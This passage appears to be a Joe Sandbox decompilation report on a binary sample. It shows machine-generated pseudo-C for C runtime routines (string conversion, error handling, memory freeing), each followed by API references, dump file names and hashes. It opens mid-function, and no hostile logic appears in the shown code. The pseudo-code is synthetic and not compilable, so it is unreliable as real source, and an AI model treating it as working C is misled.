                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				void* _v40;
                                                                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                                                                    				int _t46;
                                                                                                                                                                                                                                                    				int _t53;
                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                    				int _t57;
                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                                                                    				short* _t69;
                                                                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                                                                    				short* _t71;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t34 =  *0x116dd74; // 0x2e3e64ca
                                                                                                                                                                                                                                                    				_v8 = _t34 ^ _t70;
                                                                                                                                                                                                                                                    				E010D5E73(__ebx,  &_v28, __edx, _a4);
                                                                                                                                                                                                                                                    				_t57 = _a24;
                                                                                                                                                                                                                                                    				if(_t57 == 0) {
                                                                                                                                                                                                                                                    					_t53 =  *(_v24 + 8);
                                                                                                                                                                                                                                                    					_t57 = _t53;
                                                                                                                                                                                                                                                    					_a24 = _t53;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t67 = 0;
                                                                                                                                                                                                                                                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                                                                    				_v12 = _t40;
                                                                                                                                                                                                                                                    				if(_t40 == 0) {
                                                                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return E010DDC5F(_v8 ^ _t70);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t55 = _t40 + _t40;
                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                                                                                                                                                                                    					_t69 = 0;
                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                    					if(_t69 != 0) {
                                                                                                                                                                                                                                                    						E010DF070(_t67, _t69, _t67, _t55);
                                                                                                                                                                                                                                                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                                                                                                                                                                    						if(_t46 != 0) {
                                                                                                                                                                                                                                                    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                                                                    					E010DA61A(_t69);
                                                                                                                                                                                                                                                    					goto L15;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				_t48 = _t40 & _t55 + 0x00000008;
                                                                                                                                                                                                                                                    				_t63 = _t55 + 8;
                                                                                                                                                                                                                                                    				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                    					_t69 = E010DBD19(_t63, _t48 & _t63);
                                                                                                                                                                                                                                                    					if(_t69 == 0) {
                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *_t69 = 0xdddd;
                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                    					_t69 =  &(_t69[4]);
                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				E010DE270();
                                                                                                                                                                                                                                                    				_t69 = _t71;
                                                                                                                                                                                                                                                    				if(_t69 == 0) {
                                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				 *_t69 = 0xcccc;
                                                                                                                                                                                                                                                    				goto L9;
                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                    0x010da505
                                                                                                                                                                                                                                                    0x010da50c
                                                                                                                                                                                                                                                    0x010da518
                                                                                                                                                                                                                                                    0x010da51d
                                                                                                                                                                                                                                                    0x010da522
                                                                                                                                                                                                                                                    0x010da527
                                                                                                                                                                                                                                                    0x010da52a
                                                                                                                                                                                                                                                    0x010da52c
                                                                                                                                                                                                                                                    0x010da52c
                                                                                                                                                                                                                                                    0x010da531
                                                                                                                                                                                                                                                    0x010da54a
                                                                                                                                                                                                                                                    0x010da550
                                                                                                                                                                                                                                                    0x010da555
                                                                                                                                                                                                                                                    0x010da5f4
                                                                                                                                                                                                                                                    0x010da5f8
                                                                                                                                                                                                                                                    0x010da5fd
                                                                                                                                                                                                                                                    0x010da5fd
                                                                                                                                                                                                                                                    0x010da619
                                                                                                                                                                                                                                                    0x010da619
                                                                                                                                                                                                                                                    0x010da55b
                                                                                                                                                                                                                                                    0x010da563
                                                                                                                                                                                                                                                    0x010da567
                                                                                                                                                                                                                                                    0x010da5b3
                                                                                                                                                                                                                                                    0x010da5b5
                                                                                                                                                                                                                                                    0x010da5b7
                                                                                                                                                                                                                                                    0x010da5bc
                                                                                                                                                                                                                                                    0x010da5d3
                                                                                                                                                                                                                                                    0x010da5db
                                                                                                                                                                                                                                                    0x010da5eb
                                                                                                                                                                                                                                                    0x010da5eb
                                                                                                                                                                                                                                                    0x010da5db
                                                                                                                                                                                                                                                    0x010da5ed
                                                                                                                                                                                                                                                    0x010da5ee
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da5f3
                                                                                                                                                                                                                                                    0x010da56e
                                                                                                                                                                                                                                                    0x010da570
                                                                                                                                                                                                                                                    0x010da572
                                                                                                                                                                                                                                                    0x010da57a
                                                                                                                                                                                                                                                    0x010da597
                                                                                                                                                                                                                                                    0x010da5a1
                                                                                                                                                                                                                                                    0x010da5a6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da5a8
                                                                                                                                                                                                                                                    0x010da5ae
                                                                                                                                                                                                                                                    0x010da5ae
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da5ae
                                                                                                                                                                                                                                                    0x010da57e
                                                                                                                                                                                                                                                    0x010da582
                                                                                                                                                                                                                                                    0x010da587
                                                                                                                                                                                                                                                    0x010da58b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da58d
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?), ref: 010DA54A
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 010DA582
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 010DA5D3
                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 010DA5E5
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 010DA5EE
                                                                                                                                                                                                                                                      • Part of subcall function 010DBD19: RtlAllocateHeap.NTDLL(00000000,?,?,?,010DA5A1,00000000), ref: 010DBD4B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 313313983-0
                                                                                                                                                                                                                                                    • Opcode ID: 14f744cf830a9c8ac14ed069b2f6924ce8a7614225aac2966b5e5b6f24595379
                                                                                                                                                                                                                                                    • Instruction ID: ec18a5c474a17a4af2346c1234c8f9dfb86636726646d6354fd94fa373f77696
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14f744cf830a9c8ac14ed069b2f6924ce8a7614225aac2966b5e5b6f24595379
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31ED72A0030AEFDF259F69DC40EEE7BA5EB44210F444168FC45DB294E735DA50CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                    			E010D9CB4(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				intOrPtr _t2;
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                                    				long _t17;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t11 = __ecx;
                                                                                                                                                                                                                                                    				_t17 = GetLastError();
                                                                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                                                                    				_t2 =  *0x116d70c; // 0x2
                                                                                                                                                                                                                                                    				_t20 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                    				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                    					_t16 = E010DA67D(_t11, 1, 0x364);
                                                                                                                                                                                                                                                    					_pop(_t13);
                                                                                                                                                                                                                                                    					if(_t16 != 0) {
                                                                                                                                                                                                                                                    						_t4 = E010DA92D(_t13, _t17, __eflags,  *0x116d70c, _t16);
                                                                                                                                                                                                                                                    						__eflags = _t4;
                                                                                                                                                                                                                                                    						if(_t4 != 0) {
                                                                                                                                                                                                                                                    							E010D9AA2(_t13, _t16, 0x116df44);
                                                                                                                                                                                                                                                    							E010DA6DA(_t10);
                                                                                                                                                                                                                                                    							__eflags = _t16;
                                                                                                                                                                                                                                                    							if(_t16 != 0) {
                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_push(_t16);
                                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_push(_t10);
                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                    						E010DA6DA();
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						SetLastError(_t17);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t16 = E010DA8D7(_t11, _t17, _t20, _t2);
                                                                                                                                                                                                                                                    					if(_t16 != 0) {
                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                    						SetLastError(_t17);
                                                                                                                                                                                                                                                    						_t10 = _t16;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t10;
                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                    0x010d9cb4
                                                                                                                                                                                                                                                    0x010d9cbf
                                                                                                                                                                                                                                                    0x010d9cc1
                                                                                                                                                                                                                                                    0x010d9cc3
                                                                                                                                                                                                                                                    0x010d9cc8
                                                                                                                                                                                                                                                    0x010d9ccb
                                                                                                                                                                                                                                                    0x010d9cd9
                                                                                                                                                                                                                                                    0x010d9ce5
                                                                                                                                                                                                                                                    0x010d9ce8
                                                                                                                                                                                                                                                    0x010d9ceb
                                                                                                                                                                                                                                                    0x010d9cfd
                                                                                                                                                                                                                                                    0x010d9d02
                                                                                                                                                                                                                                                    0x010d9d04
                                                                                                                                                                                                                                                    0x010d9d0f
                                                                                                                                                                                                                                                    0x010d9d15
                                                                                                                                                                                                                                                    0x010d9d1d
                                                                                                                                                                                                                                                    0x010d9d1f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9d06
                                                                                                                                                                                                                                                    0x010d9d06
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9d06
                                                                                                                                                                                                                                                    0x010d9ced
                                                                                                                                                                                                                                                    0x010d9ced
                                                                                                                                                                                                                                                    0x010d9cee
                                                                                                                                                                                                                                                    0x010d9cee
                                                                                                                                                                                                                                                    0x010d9d21
                                                                                                                                                                                                                                                    0x010d9d22
                                                                                                                                                                                                                                                    0x010d9d22
                                                                                                                                                                                                                                                    0x010d9ccd
                                                                                                                                                                                                                                                    0x010d9cd3
                                                                                                                                                                                                                                                    0x010d9cd7
                                                                                                                                                                                                                                                    0x010d9d2a
                                                                                                                                                                                                                                                    0x010d9d2b
                                                                                                                                                                                                                                                    0x010d9d31
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9cd7
                                                                                                                                                                                                                                                    0x010d9d38

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,010D982B,010DA6CF,?,010D9C5E,00000001,00000364,?,010D4B88,?), ref: 010D9CB9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9CEE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9D15
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 010D9D22
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 010D9D2B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                    • Opcode ID: 62da8a353675fd7ebaad6d7b7c6b79ca644d584f920a2c996b4ea7f1c6a4dafe
                                                                                                                                                                                                                                                    • Instruction ID: d3a884e45189afcfdd6b4a613f4af0d3e74c4e45b8ed3004fc22350a3d03653a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62da8a353675fd7ebaad6d7b7c6b79ca644d584f920a2c996b4ea7f1c6a4dafe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F01783A304706FBCB2276796C84D9B36DDDFD56BD7200024F9D693181EF3688028221
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010DBB90(intOrPtr* _a4) {
                                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t21 = _a4;
                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                    					_t23 =  *_t21 -  *0x116dd10; // 0x116dd08
                                                                                                                                                                                                                                                    					if(_t23 != 0) {
                                                                                                                                                                                                                                                    						E010DA6DA(_t7);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x116dd14; // 0x116e181
                                                                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                                                                    						E010DA6DA(_t8);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x116dd18; // 0x116e181
                                                                                                                                                                                                                                                    					if(_t25 != 0) {
                                                                                                                                                                                                                                                    						E010DA6DA(_t9);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x116dd40; // 0x116dd0c
                                                                                                                                                                                                                                                    					if(_t26 != 0) {
                                                                                                                                                                                                                                                    						E010DA6DA(_t10);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                                                                                                                                    					_t27 = _t6 -  *0x116dd44; // 0x116e184
                                                                                                                                                                                                                                                    					if(_t27 != 0) {
                                                                                                                                                                                                                                                    						return E010DA6DA(_t6);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t6;
                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                    0x010dbb96
                                                                                                                                                                                                                                                    0x010dbb9b
                                                                                                                                                                                                                                                    0x010dbb9f
                                                                                                                                                                                                                                                    0x010dbba5
                                                                                                                                                                                                                                                    0x010dbba8
                                                                                                                                                                                                                                                    0x010dbbad
                                                                                                                                                                                                                                                    0x010dbbb1
                                                                                                                                                                                                                                                    0x010dbbb7
                                                                                                                                                                                                                                                    0x010dbbba
                                                                                                                                                                                                                                                    0x010dbbbf
                                                                                                                                                                                                                                                    0x010dbbc3
                                                                                                                                                                                                                                                    0x010dbbc9
                                                                                                                                                                                                                                                    0x010dbbcc
                                                                                                                                                                                                                                                    0x010dbbd1
                                                                                                                                                                                                                                                    0x010dbbd5
                                                                                                                                                                                                                                                    0x010dbbdb
                                                                                                                                                                                                                                                    0x010dbbde
                                                                                                                                                                                                                                                    0x010dbbe3
                                                                                                                                                                                                                                                    0x010dbbe4
                                                                                                                                                                                                                                                    0x010dbbe7
                                                                                                                                                                                                                                                    0x010dbbed
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dbbf5
                                                                                                                                                                                                                                                    0x010dbbed
                                                                                                                                                                                                                                                    0x010dbbf8

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBBA8
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: HeapFree.KERNEL32(00000000,00000000,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?), ref: 010DA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: GetLastError.KERNEL32(?,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?,?), ref: 010DA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBBBA
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBBCC
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBBDE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBBF0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: ff23d479c7736e0b1e6bed9f8aab3c3bfc9ae30eb71fe7c78569cedac7a3b5e7
                                                                                                                                                                                                                                                    • Instruction ID: 6d4c3a45b1f1c559873ee013482f6b051d49f3c6ba3240eb043a856e0bdda587
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff23d479c7736e0b1e6bed9f8aab3c3bfc9ae30eb71fe7c78569cedac7a3b5e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBF0AF32708300EB8A74EAA8FA80C5E3BD9BB682A03650C45F1D9D7844CA61F8808768
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                    			E010E160F(signed int __ecx) {
                                                                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                    				if((__ecx | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                    					_t7 =  *0x116dd00; // 0xdc2bf0
                                                                                                                                                                                                                                                    					if(_t7 != 0x116dae0) {
                                                                                                                                                                                                                                                    						E010DA6DA(_t7);
                                                                                                                                                                                                                                                    						 *0x116dd00 = 0x116dae0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E010DA6DA( *0x116ea34);
                                                                                                                                                                                                                                                    				 *0x116ea34 = 0;
                                                                                                                                                                                                                                                    				E010DA6DA( *0x116ea38);
                                                                                                                                                                                                                                                    				 *0x116ea38 = 0;
                                                                                                                                                                                                                                                    				E010DA6DA( *0x116e818);
                                                                                                                                                                                                                                                    				 *0x116e818 = 0;
                                                                                                                                                                                                                                                    				E010DA6DA( *0x116e81c);
                                                                                                                                                                                                                                                    				 *0x116e81c = 0;
                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x010e1618
                                                                                                                                                                                                                                                    0x010e161c
                                                                                                                                                                                                                                                    0x010e161e
                                                                                                                                                                                                                                                    0x010e162a
                                                                                                                                                                                                                                                    0x010e162d
                                                                                                                                                                                                                                                    0x010e1633
                                                                                                                                                                                                                                                    0x010e1633
                                                                                                                                                                                                                                                    0x010e162a
                                                                                                                                                                                                                                                    0x010e163f
                                                                                                                                                                                                                                                    0x010e164c
                                                                                                                                                                                                                                                    0x010e1652
                                                                                                                                                                                                                                                    0x010e165d
                                                                                                                                                                                                                                                    0x010e1663
                                                                                                                                                                                                                                                    0x010e166e
                                                                                                                                                                                                                                                    0x010e1674
                                                                                                                                                                                                                                                    0x010e167c
                                                                                                                                                                                                                                                    0x010e1685

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E162D
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: HeapFree.KERNEL32(00000000,00000000,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?), ref: 010DA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: GetLastError.KERNEL32(?,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?,?), ref: 010DA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E163F
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E1652
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E1663
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E1674
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: d235c0691061a65b8670495958b4a100f82e7b88d9db1ca975a9f58396bc2f9c
                                                                                                                                                                                                                                                    • Instruction ID: b71efe8acae2df2ed172a9aef5cd0cf9ebb23ae84c928749dabdbcbbff53188d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d235c0691061a65b8670495958b4a100f82e7b88d9db1ca975a9f58396bc2f9c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11F06D78A06221DB9A29AF15B8404883BA8B7787A13004636F0B1976A8C73344C29FC4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                    			E010E0FD5(intOrPtr _a4) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t42;
                                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                                                                    				WCHAR* _t48;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t49;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t61;
                                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a4 == 2 || _a4 == 1) {
                                                                                                                                                                                                                                                    					GetModuleFileNameW(0, 0x116e5f0, 0x104);
                                                                                                                                                                                                                                                    					_t48 =  *0x116e824; // 0xdb1c40
                                                                                                                                                                                                                                                    					 *0x116e828 = 0x116e5f0;
                                                                                                                                                                                                                                                    					if(_t48 == 0 ||  *_t48 == 0) {
                                                                                                                                                                                                                                                    						_t48 = 0x116e5f0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                    					E010E10F4(_t48, 0, 0,  &_v8,  &_v16);
